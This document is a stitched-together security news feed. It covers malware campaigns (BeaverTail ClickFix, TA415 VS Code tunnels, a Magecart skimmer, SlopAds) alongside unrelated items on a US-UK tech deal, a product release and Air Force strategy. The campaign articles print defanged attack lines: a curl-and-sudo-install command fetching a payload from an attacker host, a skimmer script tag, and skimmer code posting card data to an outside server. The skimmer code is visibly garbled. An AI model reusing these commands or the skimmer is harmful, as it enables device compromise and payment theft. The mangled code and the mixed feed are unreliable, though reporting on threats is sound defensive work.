• A sophisticated North Korean nation-state threat actor campaign has emerged, distributing an evolved variant of the BeaverTail malware through deceptive fake hiring platforms and ClickFix social engineering tactics.

    This latest campaign, active since May 2025, represents a significant tactical shift as threat actors expand beyond their traditional software developer targets to pursue marketing professionals, cryptocurrency traders, and retail sector personnel.

    The malware distribution infrastructure centers around a fraudulent hiring website hosted at businesshire[.]top, masquerading as a legitimate recruitment platform.

    The site offers positions including cryptocurrency trader roles at four web3 organizations and sales or marketing roles at three web3 companies and a US-based e-commerce retailer.

    When job seekers attempt to record mandatory video responses during the fake application process, they encounter fabricated technical errors requiring them to execute malicious system commands as troubleshooting steps.

    GitLab analysts identified this campaign through infrastructure analysis that revealed the threat actor’s backend service hosted at nvidiasdk.fly[.]dev remains active as of publication.

    The campaign demonstrates notable operational refinements, including the compilation of BeaverTail into standalone executables rather than relying on JavaScript interpreters, enabling the malware to function on systems without standard development tools typically found on non-technical users’ machines.

    The threat actors have implemented sophisticated evasion mechanisms throughout their infrastructure.

    The malicious service employs dynamic user agent header verification, responding with legitimate decoy payloads when accessed without specific numeric headers.

    For example, requests without proper headers receive archives containing benign VisualBasic scripts and legitimate, signed Nvidia Broadcast executables, while authentic infection attempts using headers like “203” trigger the deployment of actual BeaverTail payloads.

    Technical Infection Chain Analysis

    The BeaverTail infection mechanism varies significantly across operating systems, demonstrating the threat actor’s technical sophistication and commitment to cross-platform targeting.

    Infection chains (Source – GitLab)

    On macOS systems, the ClickFix command initiates by downloading a seemingly legitimate installer package named com.nvidiahpc.pkg, which contains no payload data but executes a malicious preinstall script.

    This script attempts to exfiltrate stored passwords from the non-standard ~/.myvars file location before downloading additional components from a GitHub repository hosted at /RominaMabelRamirez/dify.

    The infection chain proceeds through the execution of downx64.sh, which retrieves two unsigned Mach-O binaries: x64nvidia containing the stripped-down BeaverTail variant, and payuniversal2, a PyInstaller-compiled version of InvisibleFerret.

    The malware exhibits intelligent redundancy mechanisms, executing the InvisibleFerret binary only when Python 3 is unavailable at common installation locations or when BeaverTail execution fails to create the expected ~/.npc entry point file within ten seconds.

    curl - k - A 204 - o /var/tmp/ nvidia[.]pkg https[:]//nvidiasdk[.]fly[.]dev/nvs && 'sudo' installer - pkg /var/tmp/nvidia[.]pkg - target /

    Windows infections follow a different trajectory, with the ClickFix command downloading nvidia.tar.gz containing multiple components including a renamed 7zip executable and a VisualBasic launcher script.

    The update.vbs script performs dual functions: extracting password-protected Python dependencies to a hidden .pyp directory using the hardcoded password “ppp,” and launching the primary nvidiasdk[.]exe executable containing the compiled BeaverTail variant.

    Linux systems receive the most streamlined infection vector, with malicious scripts delivered directly through wget and piped into bash execution.

    The script installs Node.js via the nvm-sh installer before downloading and executing a JavaScript version of BeaverTail functionally identical to the compiled versions deployed on other platforms.

    This variant demonstrates reduced complexity compared to previous BeaverTail iterations, targeting only eight browser extensions rather than the typical 22, and omitting dedicated data extraction functions for browsers beyond Chrome.

    The simplified codebase reduces overall malware size by approximately one-third while maintaining core credential stealing and cryptocurrency wallet targeting capabilities.

    Command and control communications utilize the IP address 172.86.93[.]139 with “tttttt” serving as the campaign identifier across all infected systems.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post BeaverTail Variant via Malicious Repositories Targeting Retail Sector Organizations appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Chinese state-sponsored threat actor TA415 has evolved its tactics, techniques, and procedures by leveraging legitimate cloud services like Google Sheets and Google Calendar for command and control communications in recent campaigns targeting U.S. government, think tank, and academic organizations.

    Throughout July and August 2025, this sophisticated group conducted spearphishing operations using U.S.-China economic-themed lures, masquerading as prominent figures including the current Chair of the Select Committee on Strategic Competition between the United States and the Chinese Communist Party.

    TA415, also known as APT41, Brass Typhoon, and Wicked Panda, represents a significant shift in state-sponsored cyber operations by abandoning traditional malware delivery mechanisms in favor of legitimate development tools.

    The group’s latest campaigns have consistently utilized trusted services for command and control infrastructure, demonstrating a deliberate strategy to blend malicious activities with normal network traffic patterns.

    This approach significantly complicates detection efforts as security tools must distinguish between legitimate business communications and adversarial command channels.

    Proofpoint researchers identified that TA415’s recent operations primarily focused on intelligence collection regarding the trajectory of U.S.-China economic relations, aligning with broader geopolitical tensions and ongoing trade negotiations.

    The timing of these campaigns coincides with critical policy discussions surrounding U.S.-Taiwan relations and comprehensive sanctions frameworks targeting China, suggesting targeted intelligence requirements from state-level decision makers.

    The threat actor’s infection methodology involves delivering password-protected archives through cloud sharing services including Zoho WorkDrive, Dropbox, and OpenDrive.

    These archives contain Microsoft Shortcut files alongside hidden components stored within concealed MACOS subfolders.

    The group consistently employs Cloudflare WARP VPN services to obscure sender IP addresses during email transmission, adding an additional layer of operational security to their campaigns.

    Advanced Infection Chain Analysis

    The TA415 infection mechanism demonstrates sophisticated understanding of legitimate development workflows through its deployment of Visual Studio Code Remote Tunnels.

    TA415 VS Code Remote Tunnel infection chain (Source – Proofpoint)

    Upon execution, the malicious LNK file triggers a batch script named logon.bat, which subsequently launches the WhirlCoil Python loader through an embedded Python package.

    This loader exhibits advanced obfuscation techniques using repeated variable and function names like IIIllIIIIlIlIIlIII to evade static analysis detection methods.

    The WhirlCoil component downloads the VSCode Command Line Interface from official Microsoft sources, extracts it to %LOCALAPPDATA%\Microsoft\VSCode, and establishes persistence through scheduled tasks named GoogleUpdate, GoogleUpdated, or MicrosoftHealthcareMonitorNode.

    The script executes the command code.exe tunnel user login --provider github --name <COMPUTERNAME> to create GitHub-authenticated remote tunnels, providing persistent access without conventional malware signatures.

    System information collection includes Windows version details, locale settings, computer identification, username, and domain information, which gets transmitted via POST requests to free request logging services like requestrepo.com.

    The exfiltrated data combines with VS Code Remote Tunnel verification codes, enabling threat actors to authenticate remote sessions and execute arbitrary commands through Visual Studio’s integrated terminal interface.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post China-Aligned TA415 Hackers Uses Google Sheets and Google Calendar for C2 Communications appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The threat landscape for e-commerce websites has once again shifted with the emergence of a sophisticated Magecart-style attack campaign, characterized by the deployment of obfuscated JavaScript to harvest sensitive payment information.

    The campaign first came to light in mid-September 2025 following a tweet indicating an ongoing skimming operation, which was later investigated in detail by cybersecurity researcher, Himanshu Anand.

    This new episode demonstrates the persistent ingenuity of web skimming groups leveraging client-side injection to target unsuspecting financial transactions at scale.

    The attack vectors in question involve the injection of malicious JavaScript, hosted on attacker-controlled domains such as cc-analytics[.]com, into vulnerable checkout pages of compromised e-commerce platforms.

    Once inserted, the script seamlessly blends into legitimate payment workflows, hooking into form fields and event listeners to silently exfiltrate payment data.

    The initial code observed was heavily obfuscated, designed both to evade detection by security scanners and to frustrate analysis by incident responders.

    While the code has been reused across several campaigns, with the malware logic replicated under different domain names such as getnjs[.]com, getvjs[.]com, and utilanalytics[.]com, primarily hosted on infrastructure like IP address 45.61.136.141.

    Hosting IP extracted from URLScan transaction logs (Source – Himanshu Anand)

    Cybersecurity researcher, Himanshu Anand, noted the malware’s ability to leverage passive DNS and infrastructure fingerprinting to expand its operational reach.

    By analyzing public telemetry from sources like URLScan and WHOIS records, Anand was able to map out a constellation of related domains linked to a single cluster of attacker infrastructure.

    These pivots revealed more than a dozen active domains, some masquerading as legitimate analytics or utility services, each serving identical or near-identical skimmer payloads.

    The Malware’s Infection Mechanism

    Central to the success of this Magecart operation is its infection mechanism: a highly automated skimmer script injected via [script src = "https[:]//www[.]cc-analytics[.]com/app[.]js"].

    Once active, the code establishes event hooks on payment input fields, such as credit card numbers and billing addresses. When triggered, the script collects stolen credentials and promptly dispatches them to a remote server (pstatics[.]com) using XMLHttpRequest and FormData objects.

    The core data exfiltration logic can be described as follows:-

    function sendStolenData ("data```
      const xhr"```"new XMLHttp"```uest ();
      xhr```en ('POST', '```ps[:]//www.pstatics.com/i```
      const form```a = "new Form"```a ();
      form```a[.]append ('uid', "data```rdNumber");
    rmData[.]appendid', data[.]billingo);
    xhr[.]send"rmData"); }

    The design ensures that only valid, non-test credentials—those meeting certain length criteria—are transmitted, maximizing the quality and value of stolen data.

    This infection pathway is further reinforced by persistent infrastructure, with attackers recycling domain patterns over time.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post New Magecart Skimmer Attack With Malicious JavaScript Injection to Skim Payment Data appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • U.S. and U.K. leaders are aiming to formally sign an expansive technology partnership on Thursday as part of President Donald Trump’s state visit with U.K. leadership, according to sources familiar with the planning. 

    The details of the Tech Prosperity Deal, published on Tuesday, note that three emerging technologies will shape the partnership: artificial intelligence, quantum information sciences and technologies, and nuclear technology. Major U.S. companies — namely NVIDIA, Microsoft, Google, OpenAI and CoreWeave — jointly committed 31 billion British pounds to support the U.K.’s AI infrastructure.

    Semiconductor chip manufacturing, quantum computer development and data center development are some of the core investments on which the partnership will focus. 

    “By teaming-up with world-class companies from both the UK and US, we’re laying the foundations for a future where together we are world leaders in the technology of tomorrow, creating highly skilled jobs, putting more money in people’s pockets and ensuring this partnership benefits every corner of the United Kingdom,” Prime Minister Keir Starmer said in a news release on the deal. 

    U.K.-based companies are also bringing their capabilities to U.S. initiatives. Oxford Quantum Circuits, a quantum computer company, has installed a quantum computer in New York City, while British semiconductor and software design company Arm Holdings will collaborate with NVIDIA on forming the later companies’ Grace Blackwell chips.

    Both countries will also work together to build new nuclear power stations to expedite commercial fusion solutions and assist in the energy demand emerging systems like AI and quantum computing will demand. 

    “From the UK's perspective, it gets a huge amount of investment to boost its own AI ecosystem, and really it's a massive vote of confidence for that ecosystem and the potential that it has,” Ayesha Bhatti, the head of digital policy for the UK and EU at the Center for Data Innovation told Nextgov/FCW, adding that she, too, had been told the signing would take place Thursday.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The threat actor known as TA558 has been attributed to a fresh set of attacks delivering various remote access trojans (RATs) like Venom RAT to breach hotels in Brazil and Spanish-speaking markets. Russian cybersecurity vendor Kaspersky is tracking the activity, observed in summer 2025, to a cluster it tracks as RevengeHotels. “The threat actors continue to employ phishing emails with invoice

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated mobile ad fraud operation dubbed “SlopAds” has infiltrated Google Play Store with 224 malicious applications that collectively amassed over 38 million downloads across 228 countries and territories.

    The campaign represents one of the most extensive mobile fraud schemes discovered to date, utilizing advanced steganography techniques and multi-layered obfuscation to deliver fraudulent advertising payloads while evading detection mechanisms.

    The threat actors behind SlopAds demonstrated remarkable sophistication by implementing a conditional fraud system that only activated when users downloaded apps through specific advertising campaigns, rather than organic Play Store visits.

    This selective activation mechanism helped the malicious applications maintain their presence on the platform for extended periods while appearing legitimate to casual users and automated security systems.

    Human Security analysts identified the operation while investigating anomalous patterns in their Ad Fraud Defense solution data.

    The researchers discovered that SlopAds applications were generating approximately 2.3 billion fraudulent bid requests daily at peak operation, with traffic distribution heavily concentrated in the United States (30%), India (10%), and Brazil (7%).

    Global distribution of SlopAds-associated traffic (Source – Human Security)

    The campaign’s global reach and massive scale underscore the threat actors’ sophisticated infrastructure and operational capabilities.

    The malicious applications employed Firebase Remote Config, a legitimate Google development tool, to retrieve encrypted configuration data containing URLs for downloading the primary fraud module called “FatModule.”

    This abuse of trusted development platforms demonstrates how cybercriminals increasingly leverage legitimate services to mask their malicious activities and avoid detection by security solutions.

    Advanced Steganographic Payload Delivery System

    SlopAds employed a particularly innovative payload delivery mechanism that showcased the evolving sophistication of mobile malware operations.

    The system utilized digital steganography to hide malicious code within seemingly innocuous PNG image files, effectively bypassing traditional security scanning methods that focus on executable file analysis.

    SlopAds operation (Source – Human Security)

    When an infected application passed initial verification checks, command-and-control servers delivered four specially crafted PNG files through encrypted ZIP archives.

    These images contained hidden APK components that, when decrypted and reassembled, formed the complete FatModule responsible for executing the fraud operations.

    The steganographic approach allowed the malicious payload to traverse network security filters and application store scanning systems without triggering conventional malware detection algorithms.

    The FatModule incorporated multiple anti-analysis features, including debugging tool detection that specifically searched for hooking frameworks, Xposed modules, and Frida instrumentation tools commonly used by security researchers.

    Additionally, the module employed string encryption throughout its codebase and utilized packed native code to obscure its true functionality from static analysis tools.

    public static Boolean m45535a() {
        try {
            StackTraceElement[] stackTrace = Thread.currentThread().getStackTrace();
            for (StackTraceElement element : stackTrace) {
                String className = element.getClassName() + "#" + element.getMethodName();
                if (className.toLowerCase().contains("hook") || 
                    className.toLowerCase().contains("xpose") || 
                    className.toLowerCase().contains("frida")) {
                    return true;
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return false;
    }

    The fraud execution occurred within hidden WebViews that collected comprehensive device fingerprinting data, including hardware specifications, network information, and GPU details.

    This information enabled precise targeting while the hidden interfaces navigated to threat actor-controlled cashout domains, generating fraudulent advertisement impressions and clicks without user awareness or interaction.

    Google has since removed all identified SlopAds applications from the Play Store, and users receive automatic protection through Google Play Protect, which warns against and blocks installation of known malicious applications even from third-party sources.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post 224 Malicious Android Apps on Google Play With 38 Million Downloads Delivering Malicious Payloads appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Syteca, a global cybersecurity provider, introduced the latest release of its platform, continuing the mission to help organizations reduce insider risks and ensure sensitive data protection. Syteca 7.21 is a major update designed to enhance user privacy, simplify access management, provide seamless oversight, and improve the user experience. With release 7.21, Syteca delivers a set […]

    The post New in Syteca Release 7.21: Agentless Access, Sensitive Data Masking, and Smooth Session Playback appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Syteca, a global cybersecurity provider, introduced the latest release of its platform, continuing the mission to help organizations reduce insider risks and ensure sensitive data protection.

    Syteca 7.21 is a major update designed to enhance user privacy, simplify access management, provide seamless oversight, and improve the user experience.

    With release 7.21, Syteca delivers a set of new capabilities, from masking sensitive information in real time to simplifying remote access. These new features help address the most pressing challenges faced by security teams worldwide.

    Sensitive Data Masking

    Syteca has become the first cybersecurity vendor to deliver real-time sensitive data masking. With this feature, the platform automatically detects and obscures confidential information (e.g., passwords, credit card numbers, or personal IDs) during live sessions and in recordings.

    By blurring this data, Syteca helps prevent exposure of private information and supports compliance with data privacy regulations like the GDPR, HIPAA, and PCI DSS.

    Web Connection Manager

    Users can now launch remote sessions (RDP for Windows or SSH for Linux/Unix) directly in web browsers (Chrome, Safari, and Edge).

    This means that IT teams don’t bother with installing agents, pushing updates, or troubleshooting installation issues. They just provide fast and secure access for both employees and vendors.

    Full-Motion Capture of On-Screen Activity

    The Syteca platform can now record continuous videos of user sessions, capturing every click and cursor movement.

    Full-motion session recordings give security teams complete visibility into user activity, which can provide more detailed audit trails and speed up incident investigations. Every session is encrypted for security. 

    Intuitive UI

    Beyond new capabilities, Syteca 7.21 introduces a redesigned user interface. The updated UI has a cleaner design while keeping familiar navigation in place. The lighter interface and reduced on-screen clutter help users find key information faster, thus streamlining daily security tasks.

    “Release 7.21 gives organizations better visibility and control over their internal security,” says Oleg Shomonko, CEO of Syteca. “Features like live data masking, full-motion session recordings, and browser-based access mean our clients can enhance the security of their assets and streamline compliance while reducing IT overhead. This update reflects our focus on solving real IT security challenges without adding complexity.”

    Users interested in trying Syteca’s brand new capabilities can access the demo portal at syteca.com

    About Syteca

    Syteca is a comprehensive cybersecurity platform that helps organizations worldwide protect their inside perimeter. The Syteca platform combines advanced user activity monitoring (UAM) and robust privileged access management (PAM) solutions that empower organizations to govern access, mitigate insider threats, prevent data breaches, and streamline IT compliance. Syteca serves over 1,500 customers across different industries. 

    Contact

    Chief Marketing Officer
    Helen Gamasenko
    Syteca
    marketing@syteca.com

    The post New in Syteca Release 7.21: Agentless Access, Sensitive Data Masking, and Smooth Session Playback appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • If the United States goes to war tomorrow, its Air Force will fly and fight as the world’s best. But the service will operate in a world where the assumptions that shaped it for more than 30 years no longer hold. 

    No longer can the Air Force rely on Bagram-style air bases as sanctuaries, thanks to anti-access and area-denial capabilities developed by China and others. To deter and defeat adversaries, the service must focus on agility, adaptability, and operating with a smaller footprint in austere environments. Leaders must refine options for getting into theater to generate tempo and seize initiative. In short, the Air Force must return to its expeditionary roots—a critical change that is already underway.

    During World War II, Gen. Pete Quesada and the 9th Air Force brought expeditionary practices to the European theater. As the Third Infantry Division advanced across the continent, Quesada’s teams leap-frogged forward, establishing temporary airfields every few days to keep pace with Patton’s armored columns. Forward basing of fighter-bombers and mobile base defense, paired with air liaison officers embedded in ground units, enabled constant high-tempo combined arms to counter German Panzers. That is one example among many. But what Quesada understood—and what is essential to remember now—is that tempo and initiative are decisive advantages, especially when operating against peer adversaries in contested environments.

    Today’s expeditionary approach mixes old concepts with new ones. The Air Force’s One Force Design is a transformational framework that includes future operating concepts tailored to the complex threats of great power competition.

    Combined, these concepts create the ability to generate combat power within dense threat areas while under constant attack, employing fires in mass against enemy forces while simultaneously operating from defendable areas to project fires into highly contested environments. At the same time, One Force Design provides the flexibility and mass to span a range of potential future crises and operate globally. These capabilities are complementary—One Force Design enables sequenced operations and the ability to field a single lethal Air Force.

    Operational concepts like Agile Combat Employment bring this framework to life, enabling the footprint to be light and lean and sustain operations from austere locations.

    Critically, One Force Design also embraces interoperability, not just within formations, but with allies and partners. In today’s threat environment, everything from weapons to training to support and sustainment functions must be interchangeable, allowing rapid adjustments in dynamic operating environments. In the next fight, the Air Force will have to operate with what’s available. Interoperability is not just a convenience; it’s a necessity.

    The ability to return to an expeditionary footing depends not only on doctrine or platforms, but on leadership. The Air Force must deliberately develop expeditionary leaders, ones who can execute commander’s intent with imperfect information and use that intent to establish tempo and gain and re-gain initiative.

    The Air Force must develop Airmen with vision, judgment, competence, and courage. These leaders must be bold, adaptable, and willing to take calculated risks. They must be leaders who can cut through bureaucracy, empower subordinates, work across multinational and interagency lines, and inspire innovation in uncertain environments.

    In today’s contested operating environment, agility, adaptability, judgment, and innovation are as critical as aircraft and munitions. Without boldness at the operational edge and the ability to execute mission command, the Air Force will remain tethered to outdated methods. That risks ceding strategic ground to adversaries who are more agile and less constrained.

    Training to win

    Department-level exercises like the one recently completed in the Pacific show what it looks like to return Airmen to expeditionary roots. In July, the Department of the Air Force executed a rapid mass deployment of personnel, equipment, and aircraft to over 50 locations across 3,000 miles of the Indo-Pacific. More than 12,000 personnel and 400 aircraft participated, alongside joint and coalition forces.

    This was not business as usual. Incorporating multiple command exercises into one overall threat-deterrence scenario tested the ability to move and operate in austere conditions, with small groups of expert Airmen to repair equipment and operate in challenging environments.

    Many of these sites weren’t traditional U.S. bases. Instead, they used allied infrastructure and dual airfields—exactly the kind of operating environment the Air Force must be ready for. 

    Interoperability was central. The exercise, like previous ones, affirmed that in the next fight, the Air Force will have to use what’s already there. That means maintainers and logisticians from across the joint force and partner nations integrating seamlessly. 

    Just as important, the large exercises helped train Airmen to establish tempo and gain initiative, using mission command to adapt and act even without perfect information. It’s a first step toward restoring the expeditionary mindset we’ll need to prevail.

    One Force Design is a significant step forward; it gives direction, a shared framework, and revives our expeditionary roots. But returning to that mindset will take more than new operating concepts. It will take culture change.

    No time can be wasted. Our adversaries are learning fast and rapidly developing capabilities that challenge our air superiority. The Air Force must move faster.

    Combined exercises conducted on a global scale give a glimpse of what’s possible. These affirm that the Air Force is on the right path — but they are only the beginning.

    Above all, the Air Force must cultivate leaders prepared for the demands of 21st-century war. Much like Project Warrior in the 1980s, the Air Force must build, select, and promote leaders who can seamlessly move from peacetime to war. Today’s Airmen must understand the risks involved in near-peer conflict and be willing to own those risks in support of our national security objectives. A secure, stable future depends on it.

    Lt. Gen. David A. Harris is deputy chief of staff for Air Force Futures of the U.S. Air Force. He is the senior Air Force leader responsible for developing strategy and concepts, delivering an integrated force design, and conducting strategic assessments of the operating environment through wargames and workshops.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A decade-old Unicode vulnerability known as BiDi Swap allows attackers to spoof URLs for sophisticated phishing attacks.

    By exploiting how browsers render mixed Right-to-Left (RTL) and Left-to-Right (LTR) language scripts, threat actors can craft URLs that appear legitimate but secretly redirect users to malicious sites.

    The BiDi Swap attack builds on prior Unicode manipulation methods that have long been a concern for web security.

    In the past, attackers used Punycode Homograph Attacks to register domains with non-Latin characters that look nearly identical to Latin letters, creating convincing spoofs of popular websites.

    Another common technique was the RTL Override exploit, where special Unicode characters were embedded in a file name or URL to reverse the text direction.

    This could make a malicious executable file appear as a harmless document, tricking users into running it.

    These earlier attacks demonstrated how subtle flaws in text rendering could be exploited for malicious purposes, paving the way for more advanced techniques like BiDi Swap that abuse the fundamental logic of how browsers display web addresses.

    How the BiDi Swap Attack Works

    Web browsers rely on the Unicode Bidirectional (BiDi) Algorithm to correctly display text containing both LTR scripts, such as English, and RTL scripts, like Arabic or Hebrew.

    However, research from Varonis Threat Labs shows this algorithm has a critical weakness when handling URLs that mix scripts across subdomains and parameters.

    An attacker can exploit this by crafting a URL with a legitimate-looking LTR subdomain (e.g., paypal.com) followed by an obscure RTL domain.

    Due to the browser’s flawed rendering, the legitimate subdomain is displayed as the primary domain in the address bar, visually masking the true, malicious destination.

    This confuses the user, who believes they are on a trusted site while their browser is actually navigating to an attacker-controlled server, making them vulnerable to phishing and data theft.

    The response from browser developers to this long-standing issue has been inconsistent. Google Chrome offers a “lookalike URL” suggestion feature, but it only flags a limited number of well-known domains, leaving many others exposed.

    Mozilla Firefox takes a better approach by visually highlighting the core part of the domain in the address bar, which helps users more easily spot potential spoofs.

    While Microsoft marked the issue as resolved in its Edge browser, researchers note that the underlying vulnerability in URL representation remains.

    To stay safe, users should cultivate a habit of suspicion. Always hover over links to inspect their true destination before clicking, carefully verify a site’s SSL certificate, and be wary of any URL that appears to mix different language scripts or contains unusual formatting.

    Ultimately, enhanced user awareness and improved browser-level defenses are essential to neutralize this deceptive threat.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Hackers Exploit RTL/LTR Scripts and Browser Gaps to Hide Malicious URLs appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶